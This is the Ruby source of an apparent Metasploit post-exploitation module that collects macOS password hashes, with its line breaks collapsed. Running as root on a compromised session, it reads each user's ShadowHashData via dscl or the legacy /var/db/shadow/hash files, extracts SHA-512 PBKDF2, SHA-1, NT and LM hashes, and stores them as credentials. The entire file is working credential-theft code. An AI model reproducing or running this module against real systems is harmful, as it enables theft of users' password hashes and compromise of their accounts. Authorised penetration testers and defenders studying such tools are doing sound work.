## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/auxiliary/report' require 'rexml/document' class MetasploitModule < Msf::Post # set of accounts to ignore while pilfering data OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] include Msf::Post::File include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'OS X Gather Mac OS X Password Hash Collector', 'Description' => %q{ This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.9. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ', 'hammackj ', 'joev' ], 'Platform' => [ 'osx' ], 'SessionTypes' => [ 'shell' ] )) register_options([ OptRegexp.new('MATCHUSER', [false, 'Only attempt to grab hashes for users whose name matches this regex' ]) ]) end # Run Method for when run command is issued def run fail_with(Failure::BadConfig, "Insufficient Privileges: must be running as root to dump the hashes") unless root? # iterate over all users users.each do |user| next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user print_status "Attempting to grab shadow for user #{user}..." if gt_lion? # 10.8+ # pull the shadow from dscl shadow_bytes = grab_shadow_blob(user) next if shadow_bytes.blank? # on 10.8+ ShadowHashData stores a binary plist inside of the user.plist # Here we pull out the binary plist bytes and use built-in plutil to convert to xml plist_bytes = shadow_bytes.split('').each_slice(2).map{|s| "\\x#{s[0]}#{s[1]}"}.join # encode the bytes as \x hex string, print using bash's echo, and pass to plutil shadow_plist = cmd_exec("/bin/bash -c 'echo -ne \"#{plist_bytes}\" | plutil -convert xml1 - -o -'") # read the plaintext xml shadow_xml = REXML::Document.new(shadow_plist) # parse out the different parts of sha512pbkdf2 dict = shadow_xml.elements[1].elements[1].elements[2] entropy = Rex::Text.to_hex(dict.elements[2].text.gsub(/\s+/, '').unpack('m*')[0], '') iterations = dict.elements[4].text.gsub(/\s+/, '') salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\s+/, '').unpack('m*')[0], '') # PBKDF2 stored in format decoded_hash = "$ml$#{iterations}$#{salt}$#{entropy}" report_hash("SHA-512 PBKDF2", decoded_hash, user) elsif lion? # 10.7 # pull the shadow from dscl shadow_bytes = grab_shadow_blob(user) next if shadow_bytes.blank? # on 10.7 the ShadowHashData is stored in plaintext hash_decoded = shadow_bytes.downcase # Check if NT HASH is present if hash_decoded =~ /4f1010/ report_hash("NT", hash_decoded.scan(/^\w*4f1010(\w*)4f1044/)[0][0], user) end # slice out the sha512 hash + salt sha512 = hash_decoded.scan(/^\w*4f1044(\w*)(080b190|080d101e31)/)[0][0] report_hash("SHA-512", sha512, user) else # 10.6 and below # On 10.6 and below, SHA-1 is used for encryption guid = if gte_leopard? cmd_exec("/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp elsif lte_tiger? cmd_exec("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp end # Extract the hashes sha1_hash = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c169-216").chomp nt_hash = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c1-32").chomp lm_hash = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c33-64").chomp # Check that we have the hashes and save them if sha1_hash !~ /0000000000000000000000000/ report_hash("SHA-1", sha1_hash, user) end if nt_hash !~ /000000000000000/ report_hash("NT", nt_hash, user) end if lm_hash !~ /0000000000000/ report_hash("LM", lm_hash, user) end end end end private # @return [Bool] system version is at least 10.5 def gte_leopard? ver_num =~ /10\.(\d+)/ and $1.to_i >= 5 end # @return [Bool] system version is at least 10.8 def gt_lion? ver_num =~ /10\.(\d+)/ and $1.to_i >= 8 end # @return [String] hostname def host session.session_host end # @return [Bool] system version is 10.7 def lion? ver_num =~ /10\.(\d+)/ and $1.to_i == 7 end # @return [Bool] system version is 10.4 or lower def lte_tiger? ver_num =~ /10\.(\d+)/ and $1.to_i <= 4 end # parse the dslocal plist in lion def read_ds_xml_plist(plist_content) doc = REXML::Document.new(plist_content) keys = [] doc.elements.each("plist/dict/key") { |n| keys << n.text } fields = {} i = 0 doc.elements.each("plist/dict/array") do |element| data = [] fields[keys[i]] = data element.each_element("*") do |thing| data_set = thing.text if data_set data << data_set.gsub("\n\t\t","") else data << data_set end end i+=1 end return fields end # reports the hash info to metasploit backend def report_hash(type, hash, user) return unless hash.present? print_good("#{type}:#{user}:#{hash}") case type when "NT" private_data = "#{Metasploit::Credential::NTLMHash::BLANK_LM_HASH}:#{hash}" private_type = :ntlm_hash when "LM" private_data = "#{hash}:#{Metasploit::Credential::NTLMHash::BLANK_NT_HASH}" private_type = :ntlm_hash when "SHA-512 PBKDF2", "SHA-512", "SHA-1" private_data = hash private_type = :nonreplayable_hash end create_credential( workspace_id: myworkspace_id, origin_type: :session, session_id: session_db_id, post_reference_name: self.refname, username: user, private_data: private_data, private_type: private_type ) print_status("Credential saved in database.") end # Checks if running as root on the target # @return [Bool] current user is root def root? whoami == 'root' end # @return [String] containing blob for ShadowHashData in user's plist # @return [nil] if shadow is invalid def grab_shadow_blob(user) shadow_bytes = cmd_exec("dscl . read /Users/#{user} dsAttrTypeNative:ShadowHashData").gsub(/\s+/, '') return nil unless shadow_bytes.start_with? 'dsAttrTypeNative:ShadowHashData:' # strip the other bytes shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '') end # @return [Array] list of user names def users @users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS end # @return [String] version string (e.g. 10.8.5) def ver_num @version ||= cmd_exec("/usr/bin/sw_vers -productVersion").chomp end # @return [String] name of current user def whoami @whoami ||= cmd_exec('/usr/bin/whoami').chomp end end